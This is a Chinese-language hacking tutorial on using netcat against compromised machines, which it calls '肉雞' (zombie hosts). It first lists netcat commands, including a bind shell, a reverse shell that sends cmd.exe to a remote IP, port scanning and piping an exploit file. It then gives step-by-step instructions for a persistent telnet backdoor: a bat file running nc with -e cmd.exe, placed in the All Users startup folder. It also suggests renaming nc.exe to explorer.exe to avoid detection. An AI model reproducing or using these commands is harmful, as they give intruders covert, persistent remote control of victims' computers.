nc俗稱為網絡中的“瑞士軍刀”其功能強大，如果在肉雞上運行“nc.exe –p port –L –d –e cmd.exe”命令就可以構建一個telnet后門，即使關閉了nc.exe程序運行窗口，該后門程序還繼續存在。本案例通過一個bat文件來構建一個telnet后門，當系統重新啟動后，該后門會繼續存在。當然nc還有許多其它用法：

　　(1)連接到REMOTE主機，格式：nc -nvv 192.168.x.x 80 ，表示連到192.168.x.x的TCP80端口

　　(2)監聽LOCAL主機，格式：nc -l -p 80 ，表示監聽本機的TCP80端口

　　(3)掃描遠程主機，格式：nc -nvv -w2 -z 192.168.x.x 80-445，表示掃描192.168.x.x的TCP80到TCP445的所有端口

　　(4)REMOTE主機綁定SHELL，格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe，表示綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口

　　(5)REMOTE主機綁定SHELL并反向連接， 格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 講解：綁定REMOTE主機的CMDSHELL并反向連接到192.168.x.x的TCP5354端口。

　　(6)作攻擊程序用，格式：

　　type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80

　　nc -nvv 192.168.x.x80

　　連接到192.168.x.x的80端口，并在其管道中發送'c:\ex ploit.txt'的內容

　　(7)作蜜罐用，格式：nc -L -p 80 講解：使用'-L'(注意L是大寫)可以不停地監聽某一個端口，直到ctrl+c為止;格式：nc -L -p 80>c:\log.txt 講解：使用'-L'可以不停地監聽某一個端口，直到ctrl+c為止，同時把結果輸出到'c:\log.txt'中，如果把'& gt;' 改為'>>'即可以追加日志 附：'c:\log.txt'為日志等

    下面主要介紹如何通過nc批處理命令來構建一個telnet類型的后門：

　　1.編輯一個bat文件。

　　在IP地址為192.168.1.19的計算機上新建一個bat文件，取名為“1.bat”，在其中輸入以下內容，如圖1所示。

　　@

　　@ start

　　@c:\nc.exe –p 4455 –L –d –e cmd.exe

　　@exit

　　2.將1.bat復制到“All user”的啟動文件夾。

　　將“1.bat”文件復制到“C:\Documents and Settings\All Users\「開始」菜單\程序\啟動”文件夾下，復制1.bat文件到啟動文件夾下

　　3.等待重啟后使用telnet連接肉雞ip。

　　重啟計算機后，用戶進入計算機后，會執行“1.bat”腳本，會啟動nc程序從而開啟4455端口。在本地使用命令“telnet 192.168.1.19 4455”連接IP地址192.168.1.19 的計算機的4455端口，如圖3所示，可以通過telnet連接肉雞并在肉雞上執行各種命令。

    使用telnet連接肉雞4455端口技巧可以將nc.exe文件重新命名為其他文件，例如explorer.exe等，這樣在任務管理器中看到的nc.exe變成了explorer.exe了，不容易被發覺，而nc命令中加入“-L -d”后即使關閉了nc監聽窗口，該命令行還繼續存在。

　　小結

　　本案例通過編寫bat批處理文件，并將該bat文件放入“C:\Documents and Settings\All Users\「開始」菜單\程序\啟動”文件夾下，則無論那個用戶登陸，都會啟動該bat文件，從而保留nc的telnet后門，該后門只要知道端口，通過telnet程序可以直接連接。